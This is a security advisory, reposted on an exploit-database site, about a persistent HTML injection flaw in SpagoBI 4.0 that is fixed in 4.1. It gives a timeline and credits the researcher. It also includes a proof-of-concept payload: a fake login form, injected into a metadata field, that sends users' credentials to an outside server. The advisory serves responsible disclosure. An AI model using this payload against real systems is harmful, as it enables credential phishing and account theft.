0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SpagoBI 4.0 - Persistent HTML Script Insertion
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics. [3]SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that allows persistent script insertion. This may allow a remote attacker to inject HTML code including forms that load on a remote site, which can allow the attacker to conduct a phishing attack on a user and capture their credentials. 05. ### Technical Description / Proof of Concept Code ### The vulnerability is located in some SpagoBI input fields (e.g.'Description' input field from 'Short document metadata') To reproduce the vulnerability, the attacker (a malicious user) can add the malicious HTML script code: <form method="POST" action="http://server/login/login.php."> Username: <input type="text" name="username" size="15" /><br /> Password: <input type="password" name="passwort" size="15" /><br /> <div align="center"> <p><input type="submit" value="Login" /></p> </div> </form> in 'Description' input field from 'Short document metadata' and click on save button. The code execution happens when the victim (an unaware user) click on 'Short document metadata'. This is not the only way to inject malicious HTML code in the SpagoBI web app. 06. ### Business Impact ### Exploitation of the vulnerability requires low privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in persistent phishing and persistent external redirects. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified March 01st, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. # 0day.today [2024-12-25] #